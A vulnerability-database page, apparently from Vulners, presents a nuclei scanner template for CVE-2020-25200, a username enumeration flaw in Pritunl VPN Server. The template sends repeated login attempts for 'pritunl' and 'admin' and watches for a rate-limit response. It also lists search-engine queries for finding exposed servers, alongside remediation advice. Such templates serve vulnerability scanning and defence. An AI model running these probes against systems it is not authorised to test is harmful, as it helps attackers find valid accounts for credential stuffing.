Lucene search
K

Pritunl VPN Server 1.29.2145.25 - Username Enumeration

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

Pritunl VPN Server 1.29.2145.25 exposes username enumeration via login responses; requires network access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-25200
23 Dec 202521:02
circl
CVE
CVE-2020-25200
1 Oct 202017:36
cve
Cvelist
CVE-2020-25200
1 Oct 202017:36
cvelist
NVD
CVE-2020-25200
1 Oct 202018:15
nvd
OSV
CVE-2020-25200
1 Oct 202018:15
osv
Prion
Design/Logic Flaw
1 Oct 202018:15
prion
Positive Technologies
PT-2020-16013
1 Oct 202000:00
ptsecurity
RedhatCVE
CVE-2020-25200
22 May 202515:21
redhatcve
Vulnrichment
CVE-2020-25200
1 Oct 202017:36
vulnrichment
id: CVE-2020-25200

info:
  name: Pritunl VPN Server 1.29.2145.25 - Username Enumeration
  author: pussycat0x
  severity: medium
  description: |
    Pritunl 1.29.2145.25 contains a username enumeration issue caused by different error responses in /auth/session login attempts, letting attackers verify valid usernames, exploit requires network access to the login endpoint.
  impact: |
    Attackers can enumerate valid VPN usernames, potentially aiding targeted attacks or credential stuffing efforts.
  remediation: |
    Implement uniform error responses for login attempts to prevent username enumeration.
  reference:
    - https://github.com/lukaszstu/pritunl-CVE-2020-25200/blob/master/CVE-2020-25200
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-25200
    cwe-id: CWE-203
    epss-score: 0.0747
    epss-percentile: 0.93727
    cpe: cpe:2.3:a:pritunl:pritunl:1.29.2145.25:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 25
    vendor: pritunl
    product: pritunl
    shodan-query: http.title:"pritunl"
    fofa-query: title="pritunl"
    google-query: intitle:"pritunl"
  tags: cve,cve2020,pritunl,vpn,enum

http:
  - raw:
      - |
        POST /auth/session HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Origin: {{RootURL}}
        Referer: {{RootURL}}/login

        {"username":"{{username}}","password":"{{rand_int(10000,99999)}}"}

    attack: pitchfork

    payloads:
      username:
        - "pritunl"
        - "admin"

      attempt:
        - "1"
        - "2"
        - "3"
        - "4"
        - "5"
        - "6"
        - "7"
        - "8"
        - "9"
        - "10"
        - "11"
        - "12"
        - "13"
        - "14"
        - "15"
        - "16"
        - "17"
        - "18"
        - "19"
        - "20"
        - "21"
        - "22"
        - "23"
        - "24"
        - "25"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains_any(body, "Too many authentication attempts", "auth_too_many")'
          - 'contains(header, "application/json")'
        condition: and
# digest: 4a0a00473045022100f748350b01c8a230a101c4dc363a33a911d98d30a1fdaf94ea6336f26dc374d90220348921dba35828444f0e1798ec6e13892b1ca92c079bde235b0d44153fa05160:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 25
CVSS 3.15.3
EPSS0.0747
SSVC
17